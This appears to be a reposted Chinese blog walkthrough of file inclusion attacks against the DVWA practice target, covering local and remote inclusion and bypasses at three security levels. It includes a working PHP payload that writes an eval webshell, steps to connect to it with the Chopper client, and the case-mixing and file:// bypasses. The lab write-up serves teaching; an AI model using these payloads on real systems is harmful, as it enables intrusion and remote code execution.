首页 > 其他分享> > 漏洞复现篇——文件包含漏洞（DVWA靶场---File Inclusion【低中高级绕过】）

漏洞复现篇——文件包含漏洞（DVWA靶场---File Inclusion【低中高级绕过】）

2021-06-18 14:58:11 作者：互联网

文件包含漏洞原理介绍
在通过PHP的相应函数（比如include()）引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。
文件包含漏洞的形成，需要满足两个条件：
include()等函数通过动态变量的方式引入需要包含的文件
用户能够控制这个动态变量

本地文件包含(LFI)

能够读取或执行包含本地文件的漏洞，称为本地文件包含漏洞。

远程文件包含(RFI)

如果php.ini的配置选项allow_url_include为ON的话，文件包含函数是可以加载远程文件的，这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞，可以直接执行任意命令。

文件包含漏洞高危函数

include()
require()
include_once()
require_once()
对文件进行操作的其他函数，如f_open(),f_read()

文件包含漏洞危害

敏感信息泄露
获取Webshell
任意命令执行

实验环境：

PHPstudy
DVWA靶场
菜刀

环境搭建

打开php的配置文件，搜索`allow_url_include`，把off换成on，然后重启

在这里插入图片描述

模拟实验

`DVWA Security`low級別

在这里插入图片描述
low级别源码

本地文件包含(LFI)

1、点击`File Inclusion`中的`file1.php`

在这里插入图片描述

2、在图示位置输入`C:\Windows\System32\drivers\etc\hosts`就可以看到hosts里的内容了

在这里插入图片描述

远程文件包含(RFI)

1、查看本机IP

在这里插入图片描述

2、在www目录下创建一个内容为`<?php phpinfo();?>`的`txt`文件

在这里插入图片描述

3、在浏览器中输入IP和创建的文件，内容只显示不执行

在这里插入图片描述

4、复制URL，粘贴到DVWA的`page=`下，能够执行

在这里插入图片描述

5、将txt内容改为`<?php $file = fopen("a.php","w");fputs($file,'<?php @eval($_REQUEST[666]);?>')?>`，然后刷新页面

在这里插入图片描述

6、在`fi`后加入`a.php?666=phpinfo();`可以正常显示

在这里插入图片描述

7、复制地址`http://192.168.1.4/DVWA-master/vulnerabilities/fi/a.php`

在这里插入图片描述

8、打开菜刀添加网址，输入666密码连接

在这里插入图片描述

9、点击添加的连接对象，成功进入

在这里插入图片描述

`DVWA Security`Medium級別

Medium級別源码
在这里插入图片描述

本地文件包含(LFI)

这里与低级别一样`C:\Windows\System32\drivers\etc\hosts`路径能够正常执行

在这里插入图片描述

远程文件包含(RFI)

这里只需把http、https掺入大小写即可

在这里插入图片描述

`DVWA Security`High級別

High級別源码
在这里插入图片描述

本地文件包含(LFI)

这里利用`file://`即可实现绕过

在这里插入图片描述

标签：文件,包含,Inclusion,級別,DVWA,漏洞,include
来源： https://blog.51cto.com/u_15274949/2922443